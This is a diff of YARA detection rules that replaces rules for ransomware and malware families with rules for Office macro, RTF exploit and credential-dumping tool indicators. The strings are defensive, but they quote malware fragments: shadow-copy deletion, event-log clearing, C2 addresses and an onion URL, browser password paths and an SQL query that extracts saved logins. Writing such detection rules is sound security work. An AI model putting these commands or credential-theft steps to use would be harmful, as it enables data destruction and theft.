-rule DITEKSHEN_MALWARE_Win_Khonsari : FILE
+rule DITEKSHEN_INDICATOR_OOXML_Excel4Macros_EXEC : FILE
 {
 	meta:
-		description = "Detects Khonsari ransomware"
+		description = "Detects OOXML (decompressed) documents with Excel 4 Macros XLM macrosheet"
 		author = "ditekSHen"
-		id = "2d562e62-a948-570d-8ff2-cc4835b91573"
+		id = "674ef310-d3bc-5e15-862f-29aa111becb3"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8951-L8963"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L885-L898"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2a78f36259481fccb31b2e6248fed19699b6eb05bacfd08905414764c3045943"
+		logic_hash = "ab3994e4082390f65d030db0b898a20df1d7e4b0ca2fdedc7a9d0f1480fd0334"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
+		clamav_sig = "INDICATOR.OOXML.Excel4MacrosEXEC"
 
 	strings:
-		$x1 = ".khonsari" fullword wide nocase
-		$s1 = "Encrypt" fullword ascii
-		$s2 = "CreateEncryptor" fullword ascii
-		$s3 = "GenerateKey" fullword ascii
-		$s4 = "277e5e6a-4da6-4138-97fa-3fecbdad0176" ascii
+		$ms = "<xm:macrosheet" ascii nocase
+		$s1 = ">FORMULA.FILL(" ascii nocase
+		$s2 = ">REGISTER(" ascii nocase
+		$s3 = ">EXEC(" ascii nocase
+		$s4 = ">RUN(" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or ( all of ( $s* ) ) )
+		uint32( 0 ) == 0x6d783f3c and $ms and ( 2 of ( $s* ) or ( $s3 ) )
 }
-
-rule DITEKSHEN_MALWARE_Win_Quantum : FILE
+rule DITEKSHEN_INDICATOR_OOXML_Excel4Macros_Autoopenhidden : FILE
 {
 	meta:
-		description = "Detects Quantum locker / ransomware"
+		description = "Detects OOXML (decompressed) documents with Excel 4 Macros XLM macrosheet auto_open and state hidden"
 		author = "ditekSHen"
-		id = "76a9240e-5b4f-5a1e-9841-e5ba855fb06f"
+		id = "c5aab620-5254-5fc6-b236-4fe0f69cbd8e"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8965-L8987"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L900-L910"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f35422d1f52f1f9f55a5e38c782d2cf621cd84da028358ab250584334d41249c"
-		score = 50
-		quality = 35
+		logic_hash = "a93d8aa7ac025a0c2e8a9ac833f6d4c3cd3769ffca3f87455f43411d0021e828"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		clamav_sig = "INDICATOR.OOXML.Excel4MacrosEXEC"
 
 	strings:
-		$x1 = "\\t<title>Quantum</title>" ascii wide
-		$x2 = "Quantum Locker.<br><br>" ascii wide
-		$s1 = "ERROR" fullword wide
-		$s2 = ".log" fullword wide
-		$s3 = "SLOW" fullword wide
-		$s4 = "Create" fullword wide
-		$s5 = "Integrity" fullword wide
-		$s6 = "Disabled" fullword wide
-		$s7 = "Deny" fullword wide
-		$s8 = "FAST" fullword wide
-		$s9 = "Mandatory" fullword wide
-		$s10 = "plugin.dll" fullword ascii
-		$s11 = "NetGetDCName" fullword ascii
-		$s12 = "NetShareEnum" fullword ascii
-		$s13 = "NetGetJoinInformation" fullword ascii
+		$s1 = "state=\"veryhidden\"" ascii nocase
+		$s2 = "<definedName name=\"_xlnm.Auto_Open" ascii nocase
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 9 of ( $s* ) or ( pe.number_of_exports == 2 and pe.exports ( "RunW" ) and pe.exports ( "runW" ) and 5 of ( $s* ) ) ) ) or all of ( $x* )
+		uint32( 0 ) == 0x6d783f3c and all of them
 }
-rule DITEKSHEN_MALWARE_Win_Owowa : FILE
+rule DITEKSHEN_INDICATOR_SUSPICOIUS_RTF_Encodedurl : FILE
 {
 	meta:
-		description = "Detects Owowa"
+		description = "Detects executables calling ClearMyTracksByProcess"
 		author = "ditekSHen"
-		id = "c0a61601-e810-5acc-91a3-fa70db6d94da"
+		id = "6b3f0434-24b2-5ae8-a6fc-c0fdded4996f"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8989-L9007"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L930-L941"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "afdeb30845ed4ef7b79e733e05d3e1ee53a8c441db74519577893d75c1249a41"
+		logic_hash = "cb791bb5e2af46ff9f1f07cef33bbd51edc44b2394d6f3eff31d39eaa5ff2a33"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$u1 = "jFuLIXpzRdateYHoVwMlfc" fullword ascii wide
-		$u2 = "Fb8v91c6tHiKsWzrulCeqO" fullword ascii wide
-		$u3 = "dEUM3jZXaDiob8BrqSy2PQO1" fullword ascii wide
-		$s1 = "powershell.exe" fullword wide
-		$s2 = "<RSAKeyValue><Modulus>" wide
-		$s3 = "HealthMailbox" fullword wide
-		$s4 = "6801b573-4cdb-4307-8d4a-3d1e2842f09f" ascii
-		$s5 = "<PreSend_RequestContent>b__" ascii
-		$s6 = "ClearHeaders" fullword ascii
-		$s7 = "get_UserHostAddress" fullword ascii
-		$s8 = "ExtenderControlDesigner" fullword ascii
+		$s1 = "\\u-65431?\\u-65419?\\u-65419?\\u-65423?\\u-" ascii wide
+		$s2 = "\\u-65432?\\u-65420?\\u-65420?\\u-65424?\\u-" ascii wide
+		$s3 = "\\u-65433?\\u-65430?\\u-65427?\\u-65434?\\u-" ascii wide
+		$s4 = "\\u-65434?\\u-65431?\\u-65428?\\u-65435?\\u-" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $u* ) or ( 2 of ( $u* ) and 3 of ( $s* ) ) or 6 of ( $s* ) )
+		uint32( 0 ) == 0x74725c7b and any of them
 }
-rule DITEKSHEN_MALWARE_Win_Chebka : FILE
+rule DITEKSHEN_INDICATOR_RTF_Remotetemplate : CVE_2017_11882 FILE
 {
 	meta:
-		description = "Detects Chebka"
+		description = "Detects RTF documents potentially exploiting CVE-2017-11882"
 		author = "ditekSHen"
-		id = "df486522-695c-56f5-b93a-6f16829a3a3e"
+		id = "59b31243-a360-531f-99ea-32b54d19ab52"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9009-L9030"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L943-L953"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cc8123a5d20fac51d4dfc225e743539456efb4d649060d078c3ed93e7724da01"
-		score = 75
-		quality = 50
-		tags = "FILE"
+		logic_hash = "3a75072bc4d9c7dc53220afe359911c04cd3267c142058352de80ec430a53517"
+		score = 60
+		quality = 35
+		tags = "CVE-2017-11882, FILE"
 
 	strings:
-		$s1 = "-k netsvcs" wide
-		$s2 = "%ssvchost.exe -k SystemNetworkService" wide
-		$s3 = "Mozilla/4.0 (compatible)" wide
-		$s4 = "_kasssperskdy" wide
-		$s5 = "winssyslog" wide
-		$s6 = "LoaderDll%d" wide
-		$s7 = "cmd.exe /c rundll32.exe shell32.dll," wide
-		$s8 = /cmd.exe \/c start (chrome|msedge|firefox|iexplorer)\.exe/ wide
-		$f1 = ".?AVCHVncManager@@" fullword ascii
-		$f2 = ".?AVCNetstatManager@@" fullword ascii
-		$f3 = ".?AVCTcpAgentListener@@" fullword ascii
-		$f4 = ".?AVIUdpClientListener@@" fullword ascii
-		$f5 = ".?AVCShellManager@@" fullword ascii
-		$f6 = ".?AVCScreenSpy@@" fullword ascii
+		$s1 = "{\\*\\template http" ascii nocase
+		$s2 = "{\\*\\template file" ascii nocase
+		$s3 = "{\\*\\template \\u-" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or all of ( $f* ) or ( 3 of ( $f* ) and 3 of ( $s* ) ) or ( #s8 > 2 and 5 of them ) )
+		uint32( 0 ) == 0x74725c7b and 1 of them
 }
-rule DITEKSHEN_MALWARE_Win_Flagpro : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Lazagne : FILE
 {
 	meta:
-		description = "Detects Flagpro"
+		description = "Detects LaZagne post-exploitation password stealing tool. It is typically embedded with malware in the binary resources."
 		author = "ditekSHen"
-		id = "da1bf899-feb5-5ed0-956e-c20bc3565a6e"
+		id = "68bc50b0-a64f-50b6-bfbf-a26a4d0970ef"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9032-L9049"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L3-L20"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c5e5944426b7be690ad62dd0d98a8fc6f8135cab0dbdd8a5aaf1670491eda59d"
+		logic_hash = "af4427174c1026204dc9c71878c5125efdf190328840b65fe4a69277a16fe7d2"
 		score = 75
 		quality = 50
 		tags = "FILE"
 
 	strings:
-		$s1 = "download...." fullword ascii
-		$s2 = "~MYTEMP" fullword wide
-		$s3 = ".?AVCV20_LoaderApp@@" fullword ascii
-		$s4 = ".?AVCV20_LoaderDlg@@" fullword ascii
-		$s5 = "ExecYes" fullword ascii
-		$s6 = /<BODY ID=CV\d+_LoaderDlg BGCOLOR=/ ascii
-		$n1 = "://139.162.87.180" wide
-		$n2 = "://172.104.109.217" wide
-		$n3 = "://org.misecure.com/index.html" wide
-		$b1 = /(get all|click|close|maybe|get_outerHTML|download\d) (finished|pass|ok|windows|failed)!/ fullword ascii
+		$s1 = "blaZagne.exe.manifest" fullword ascii
+		$S2 = "opyi-windows-manifest-filename laZagne.exe.manifest" fullword ascii
+		$s3 = "lazagne.softwares.windows." ascii
+		$s4 = "lazagne.softwares.sysadmin." ascii
+		$s5 = "lazagne.softwares.php." ascii
+		$s6 = "lazagne.softwares.memory." ascii
+		$s7 = "lazagne.softwares.databases." ascii
+		$s8 = "lazagne.softwares.browsers." ascii
+		$s9 = "lazagne.config.write_output(" fullword ascii
+		$s10 = "lazagne.config." ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of ( $s* ) or ( 1 of ( $n* ) and ( 2 of ( $s* ) or 1 of ( $b* ) ) ) or ( 2 of ( $s* ) and 1 of ( $b* ) )
+		uint16( 0 ) == 0x5a4d and any of them
 }
-rule DITEKSHEN_MALWARE_Win_Nplusminer
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Credstealer : FILE
 {
 	meta:
-		description = "Detects PowerShell based NPlusMiner"
+		description = "Detects Python executable for stealing credentials including domain environments. Observed in MuddyWater."
 		author = "ditekSHen"
-		id = "a16b504f-e69a-5abb-8e37-01bf7c2df6ef"
+		id = "ab587b12-f3e1-5f08-b27c-03ee9752e513"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9051-L9064"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L22-L41"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f6b81c2276765455d46e20ed81e19caa3ae36a31827568486a09bc1619ec478c"
+		logic_hash = "e729c8b0b1db642acabbc4590833c05ce81447bb89e5f40aea5f0b8ebdee4438"
 		score = 75
 		quality = 75
-		tags = ""
-		snort_sid = "920284"
+		tags = "FILE"
 
 	strings:
-		$s1 = "$Core | Add-Member @{IsReadOnly = $((Get-ItemProperty -Path \".\\Includes\\Core.ps1\").IsReadOnly)} -Force" fullword ascii
-		$s2 = "$Core | Add-Member @{MinerCustomConfig = $((Get-Content \".\\Config\\MinerCustomConfig.json\" -Raw))} -Force" fullword ascii
-		$s3 = "If ($Variables.CheatGuy -and $Core.corehash -in $Hashes -and $Core.ScriptStartDate -le (Get-Date)" ascii
-		$s4 = "Try{(Get-ItemProperty -Path \".\\Includes\\Core.ps1\").IsReadOnly = $false} catch {}" fullword ascii
-		$s5 = " NPlusMiner/" ascii
+		$s1 = "PYTHON27.DLL" fullword wide
+		$s2 = "C:\\Python27\\lib\\site-packages\\py2exe\\boot_common.pyR" fullword ascii
+		$s3 = "C:\\Python27\\lib\\site-packages\\py2exe\\boot_common.pyt" fullword ascii
+		$s4 = "subprocess.pyc" fullword ascii
+		$s5 = "MyGetProcAddress(%p, %p(%s)) -> %p" fullword ascii
+		$p1 = "Dump SAM hashes from target systemss" fullword ascii
+		$p2 = "Dump LSA secrets from target systemss" fullword ascii
+		$p3 = "Dump the NTDS.dit from target DCs using the specifed method" fullword ascii
+		$p4 = "Dump NTDS.dit password historys" fullword ascii
+		$p5 = "Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameterss" fullword ascii
+		$p6 = "Retrieve plaintext passwords and other information for accounts pushed through Group Policy Preferencess" fullword ascii
+		$p7 = "Combo file containing a list of domain\\username:password or username:password entriess" fullword ascii
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) and 1 of ( $p* ) )
 }
-rule DITEKSHEN_MALWARE_Win_PWSH_Poshcookiestealer
+rule DITEKSHEN_INDICATOR_TOOL_CNC_Shootback : FILE
 {
 	meta:
-		description = "Detects PowerShell PoshCookieStealer"
+		description = "detects Python executable for CnC communication via reverse tunnels. Used by MuddyWater group."
 		author = "ditekSHen"
-		id = "7326a056-288b-534b-811d-172bd6936d7b"
+		id = "fb608115-6d9f-5640-88be-674e53b07126"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9066-L9080"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L43-L62"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "234958098d09732675dd539e8d25c6754ba50bf92b3a19e7fef8c68d70503ec4"
+		logic_hash = "996cabd4965164cb844cee1ab1e2894fc2b4fac14d4e660c456b494c5cbd0688"
 		score = 75
-		quality = 75
-		tags = ""
+		quality = 50
+		tags = "FILE"
 
 	strings:
-		$s1 = "\\User Data\\default\\Network\\Cookies" ascii nocase
-		$s2 = "Send-ToEmail" ascii
-		$s3 = "[Security.Cryptography.ProtectedData]::Unprotect($" ascii
-		$s4 = "$($env:LOCALAPPDATA)\\" ascii
-		$s5 = "$($env:HOMEPATH)\\" ascii
-		$s6 = "|ForEach-Object ToString X2) -join ''" ascii
-		$s7 = ".Attachments.Add($" ascii
+		$s1 = "PYTHON27.DLL" fullword wide
+		$s2 = "C:\\Python27\\lib\\site-packages\\py2exe\\boot_common.pyR" fullword ascii
+		$s3 = "C:\\Python27\\lib\\site-packages\\py2exe\\boot_common.pyt" fullword ascii
+		$s4 = "subprocess.pyc" fullword ascii
+		$s5 = "MyGetProcAddress(%p, %p(%s)) -> %p" fullword ascii
+		$p1 = "Slaver(this pc):" ascii
+		$p2 = "Master(another public server):" ascii
+		$p3 = "Master(this pc):" ascii
+		$p4 = "running as slaver, master addr: {} target: {}R/" fullword ascii
+		$p5 = "Customer(this pc): " ascii
+		$p6 = "Customer(any internet user):" ascii
+		$p7 = "the actual traffic is:  customer <--> master(1.2.3.4) <--> slaver(this pc) <--> ssh(this pc)" fullword ascii
 
 	condition:
-		5 of them
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) and 2 of ( $p* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Garrantdecrypt : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Fgdump : FILE
 {
 	meta:
-		description = "Detects GarrantDecrypt ransomware"
+		description = "detects all versions of the password dumping tool, fgdump. Observed to be used by DustSquad group."
 		author = "ditekSHen"
-		id = "e3be3663-9978-5b8e-b6b2-0f44f269adb2"
+		id = "2759fce2-db2a-5a48-bb37-931fd847a32d"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9082-L9096"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L64-L81"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "84b139e51f0ef0389c641d62409d702b0ae7ec6ecd2fa54baf2cf0c0078a8f5a"
+		logic_hash = "fdccd91a84374f7c94843bd9c2191720959416acf2e33d7b28b42d63d7ea4ce3"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "%appdata%\\_uninstalling_.png" fullword wide
-		$x2 = "C:\\Windows\\sysnative\\vssadmin.exe" fullword wide
-		$x3 = /(ICQ|Skype) (@nuncatarde|@supersuso|@Whitehorsedecryption|@likeahorse|@Konwarszawski|@zipzipulya|Whitehorsedecryption|LIKEAHORSE DECRYPTION|Zip Zipulya)/ ascii
-		$s1 = "your unique ID" ascii
-		$s2 = "Google market ICQ" ascii
-		$s3 = "If you want to restore them, install ICQ" ascii
-		$s4 = "Write to our ICQ @" ascii
+		$s1 = "dumping server %s" ascii
+		$s2 = "dump on server %s" ascii
+		$s3 = "dump passwords: %s" ascii
+		$s4 = "Dumping cache" nocase ascii
+		$s5 = "SECURITY\\Cache" ascii
+		$s6 = "LSASS.EXE process" ascii
+		$s7 = " AntiVirus " nocase ascii
+		$s8 = " IPC$ " ascii
+		$s9 = "Exec failed, GetLastError returned %d" fullword ascii
+		$10 = "writable connection to %s" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 2 of ( $x* ) and 1 of ( $s* ) ) or all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-rule DITEKSHEN_MALWARE_Win_Locked : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Sharpweb : FILE
 {
 	meta:
-		description = "Detects Locked ransomware"
+		description = "detects all versions of the browser password dumping .NET tool, SharpWeb."
 		author = "ditekSHen"
-		id = "ad2f91ab-9bbb-5d47-a5c3-5a38dbab2ebe"
+		id = "f85dd689-c2a9-5cea-9c19-1e66ec942606"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9098-L9114"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L83-L110"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b838b996946fb268c66bac68d5e326ff3049340dfb08f2e0a77492df49915d5a"
+		logic_hash = "036d576eb7acdededda7b31d3dda3a4928e01ff761bf45a1112da6bf7d4e2966"
 		score = 75
-		quality = 48
+		quality = 40
 		tags = "FILE"
 
 	strings:
-		$x1 = "http://xxxx.onion/xxxx-xxxx-xxxx-xxxx" ascii
-		$x2 = "http://pigetrzlperjreyr3fbytm27bljaq4eungv3gdq2tohnoyfrqu4bx5qd.onion" ascii
-		$x3 = "dHA6Ly94eHh4Lm9uaW9uL3h4eHgteHh4eC14eHh4LXh4eHg" ascii
-		$s1 = "choice /t 1 /d y /n >nul" ascii
-		$s2 = ".locked" fullword ascii
-		$s3 = "c:\\system volume information" fullword ascii
-		$s4 = "__$$RECOVERY_README$$__.html" fullword ascii
-		$s5 = "Trunc..." fullword ascii
-		$s6 = /C:\\windows\\temp\\[a-z0-9A-Z]{6}\.tmp/ fullword ascii
+		$param1 = "logins" nocase wide
+		$param2 = "cookies" nocase wide
+		$param3 = "edge" nocase wide
+		$param4 = "firefox" nocase wide
+		$param5 = "chrome" nocase wide
+		$path1 = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" wide
+		$path2 = "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" wide
+		$path3 = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies" wide
+		$path4 = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks" wide
+		$sql1 = "UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;" nocase wide
+		$sql2 = "UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d" nocase wide
+		$sql3 = "SELECT action_url, username_value, password_value FROM logins" nocase wide
+		$func1 = "get_encryptedPassword" fullword ascii
+		$func2 = "<GetLogins>g__GetVaultElementValue0_0" fullword ascii
+		$func3 = "<encryptedPassword>k__BackingField" fullword ascii
+		$pdb = "\\SharpWeb\\obj\\Debug\\SharpWeb.pdb" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or all of ( $s* ) or ( 1 of ( $x* ) and 4 of ( $s* ) ) or ( #s6 > 1 and 4 of them ) )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $func* ) and 3 of ( $param* ) and ( 1 of ( $path* ) or 1 of ( $sql* ) ) ) or $pdb )
 }
-rule DITEKSHEN_MALWARE_Win_Maze : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Blackbone : FILE
 {
 	meta:
-		description = "Detects Maze ransomware"
+		description = "detects Blackbone password dumping tool on Windows 7-10 operating system."
 		author = "ditekSHen"
-		id = "f5d1d3e2-1ffe-5ec6-b1ee-bded81867fb8"
+		id = "a6d9f9d1-75fb-51af-87ad-80b4e135e759"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9116-L9145"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L112-L129"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d3ce3b43c65dfd9f59ba3c6b64e8d7687db175673cc62068caa1e1da023390c0"
+		logic_hash = "e9dacd28accaef8a93ff8d3b5cf9437b3848791711a4a7118ab46d2bb6ca42d3"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "Uc32nbspacec97c98c99c100c101c102c103c104c105c106c107c108c109c110c" ascii
-		$s1 = "\"%s\" shadowcopy delete" wide
-		$s2 = "[%windir%\\system32\\wbem\\wmic" wide
-		$s3 = "process call create \"cmd /c start %s\"" wide
-		$s4 = "DECRYPT-FILES.html" fullword wide
-		$s5 = "Dear %s, your files" wide
-		$s6 = "%s! Alert! %s! Alert!" wide
-		$s7 = "%BASE64_PLACEHOLDER%" fullword ascii
-		$s8 = "-orDGorX0or" fullword ascii
-		$s9 = { 47 45 54 20 2f 25 73 20 48 54 54 50 2f 31 2e 31
-               0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 25 73
-               0d 0a 48 6f 73 74 3a 20 25 73 0d 0a 43 6f 6e 6e
-               65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69
-               76 65 0d 0a 0d 0a 00 50 4f 53 54 20 2f 25 73 20
-               48 54 54 50 2f 31 2e 31 0d 0a 55 73 65 72 2d 41
-               67 65 6e 74 3a 20 25 73 0d 0a 48 6f 73 74 3a 20
-               25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65
-               3a 20 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65
-               6e 67 74 68 3a 20 25 64 0d 0a 43 6f 6e 6e 65 63
-               74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65
-               0d 0a 0d 0a 00 0d 0a 0d 0a 00 43 6f 6e 74 65 6e
-               74 2d 4c 65 6e 67 74 68 3a 20 00 }
+		$s1 = "BlackBone: %s: " ascii
+		$s2 = "\\BlackBoneDrv\\" ascii
+		$s3 = "\\DosDevices\\BlackBone" fullword wide
+		$s4 = "\\Temp\\BBImage.manifest" wide
+		$s5 = "\\Device\\BlackBone" fullword wide
+		$s6 = "BBExecuteInNewThread" fullword ascii
+		$s7 = "BBHideVAD" fullword ascii
+		$s8 = "BBInjectDll" fullword ascii
+		$s9 = "ntoskrnl.exe" fullword ascii
+		$s10 = "WDKTestCert Ton," ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 3 of ( $s* ) ) or 6 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-rule DITEKSHEN_MALWARE_Win_Teslarevenge : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Mimikatz : FILE
 {
 	meta:
-		description = "Detects TeslaRevenge ransomware"
+		description = "Detects Mimikatz"
 		author = "ditekSHen"
-		id = "13e5bb15-47eb-5e49-a1a5-3d51cacede2f"
+		id = "feb236c0-6e0d-5c2c-a050-cf1d000aaf38"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9147-L9167"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L131-L164"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0f68eae8a076d00c8d058ec148d3557f5770dc827d4690b931faf98797426dbc"
+		logic_hash = "42c9c78c88bb7c427d5f0bf1d3b0113205780142b499eb17858037ded0f2971e"
 		score = 75
-		quality = 65
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$s1 = "autospreadifnoav=" ascii wide
-		$s2 = "autospread=" ascii wide
-		$s3 = "noencryptext=" ascii wide
-		$s4 = "teslarvng" wide
-		$s5 = "finished encrypting" wide nocase
-		$s6 = "net scan" wide nocase
-		$s7 = "for /f %%x in ('wevtutil el') do wevtutil cl" ascii
-		$s8 = "tasklist | find /i \"SDELETE.exe\"" ascii
-		$e1 = "mshta.exe" ascii wide nocase
-		$e2 = "sc.exe" ascii wide nocase
-		$e3 = "vssadmin.exe" ascii wide nocase
-		$e4 = "wbadmin.exe" ascii wide nocase
-		$e5 = "cmd.exe" ascii wide nocase
+		$s1 = "mimilib.dll" ascii
+		$s2 = "mimidrv.sys" ascii
+		$s3 = "mimikatz.exe" ascii
+		$s4 = "\\mimidrv.pdb" ascii
+		$s5 = "mimikatz" ascii
+		$s6 = { 6d 00 69 00 6d 00 69 00 6b 00 61 00 74 00 7a }
+		$s7 = { 5c 00 6d 00 69 00 6d 00 69 00 64 00 72 00 76 }
+		$s8 = { 6d 00 69 00 6d 00 69 00 64 00 72 00 76 }
+		$s9 = "Lecture KIWI_MSV1_0_" ascii
+		$s10 = "Search for LSASS process" ascii
+		$f1 = "SspCredentialList" ascii
+		$f2 = "KerbGlobalLogonSessionTable" ascii
+		$f3 = "LiveGlobalLogonSessionList" ascii
+		$f4 = "TSGlobalCredTable" ascii
+		$f5 = "g_MasterKeyCacheList" ascii
+		$f6 = "l_LogSessList" ascii
+		$f7 = "lsasrv!" ascii
+		$f8 = "SekurLSA" ascii
+		$f9 = /Cached(Unlock|Interative|RemoteInteractive)/ ascii
+		$dll_1 = { c7 0? 00 00 01 00 [4-14] c7 0? 01 00 00 00 }
+		$dll_2 = { c7 0? 10 02 00 00 ?? 89 4? }
